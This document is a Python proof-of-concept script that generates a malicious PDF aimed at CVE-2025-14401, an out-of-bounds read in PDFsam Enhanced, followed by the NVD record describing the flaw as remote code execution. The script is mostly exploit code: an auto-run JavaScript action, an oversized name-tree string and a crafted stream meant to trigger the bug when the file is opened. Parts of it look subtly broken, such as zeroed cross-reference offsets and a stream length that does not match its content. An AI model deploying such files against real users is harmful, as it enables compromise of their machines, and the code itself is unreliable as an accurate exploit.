CVE-2025-14401

#!/usr/bin/env python3 """ CVE-2025-14401 PoC - PDFsam Enhanced App Object Out-of-Bounds Read This PoC demonstrates the vulnerability in PDFsam Enhanced's App object handling. Note: This is for educational and authorized testing purposes only. """ import struct from io import BytesIO def create_malicious_pdf(): """ Create a malicious PDF file that triggers the App object OOB read vulnerability. The vulnerability exists in how PDFsam Enhanced processes App dictionary objects. """ # PDF Header pdf_content = b'%PDF-1.7\n' pdf_content += b'%\xe2\xe3\xcf\xd3\n' # Object 1: Catalog obj1_offset = len(pdf_content) pdf_content += b'1 0 obj\n' pdf_content += b'<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\n' pdf_content += b'endobj\n\n' # Object 2: Pages pdf_content += b'2 0 obj\n' pdf_content += b'<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n' pdf_content += b'endobj\n\n' # Object 3: Page pdf_content += b'3 0 obj\n' pdf_content += b'<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\n' pdf_content += b'endobj\n\n' # Object 4: Trigger - Malicious App Object # This object exploits the OOB read in App object handling # The vulnerability is triggered when PDFsam processes malformed App dictionary pdf_content += b'4 0 obj\n' pdf_content += b'<< /Type /Action /S /JavaScript /JS (\n' pdf_content += b'this.app.alert("Vulnerability Trigger Point");\n' # Crafted App object that triggers OOB read pdf_content += b'var app = this.syncApp;\n' pdf_content += b'for(var i = 0; i < 0xFFFFFFFF; i++) {\n' pdf_content += b' try { app.viewerVersion; } catch(e) { break; }\n' pdf_content += b'}\n' pdf_content += b') >>\n' pdf_content += b'endobj\n\n' # Object 5: Extended App Object with malformed data # This triggers the OOB read vulnerability pdf_content += b'5 0 obj\n' pdf_content += b'<< /Type /Catalog /Names << /EmbeddedFiles 6 0 R >> >>\n' pdf_content += b'endobj\n\n' # Object 6: Malformed name tree that triggers OOB pdf_content += b'6 0 obj\n' pdf_content += b'<< /Names [\n' # Crafted data that causes buffer over-read pdf_content += b'(' + b'A' * 10000 + b')\n' pdf_content += b'7 0 R\n' pdf_content += b'] >>\n' pdf_content += b'endobj\n\n' # Object 7: Stream object with crafted data pdf_content += b'7 0 obj\n' pdf_content += b'<< /Length 44 >>\n' pdf_content += b'stream\n' # Trigger OOB read by accessing memory beyond buffer pdf_content += b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\n' pdf_content += b'endstream\n' pdf_content += b'endobj\n\n' # Cross-reference table xref_offset = len(pdf_content) pdf_content += b'xref\n' pdf_content += b'0 8\n' pdf_content += b'0000000000 65535 f \n' pdf_content += f'{obj1_offset:010d} 00000 n \n'.encode() pdf_content += b'0000000000 00000 n \n' pdf_content += b'0000000000 00000 n \n' pdf_content += b'0000000000 00000 n \n' pdf_content += b'0000000000 00000 n \n' pdf_content += b'0000000000 00000 n \n' pdf_content += b'0000000000 00000 n \n' # Trailer pdf_content += b'trailer\n' pdf_content += b'<< /Size 8 /Root 1 0 R >>\n' pdf_content += b'startxref\n' pdf_content += f'{xref_offset}\n'.encode() pdf_content += b'%%EOF\n' return pdf_content def main(): """Generate and save the malicious PDF file.""" print("[*] Generating CVE-2025-14401 PoC PDF...") pdf_data = create_malicious_pdf() output_file = "CVE-2025-14401-poc.pdf" with open(output_file, 'wb') as f: f.write(pdf_data) print(f"[+] PoC PDF saved to: {output_file}") print("[*] When opened in PDFsam Enhanced, this file triggers an OOB read vulnerability") print("[*] The vulnerability allows arbitrary code execution in the context of the current process") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14401", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.573", "lastModified": "2026-01-15T17:16:48.977", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced App Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of App objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27260."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1089/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}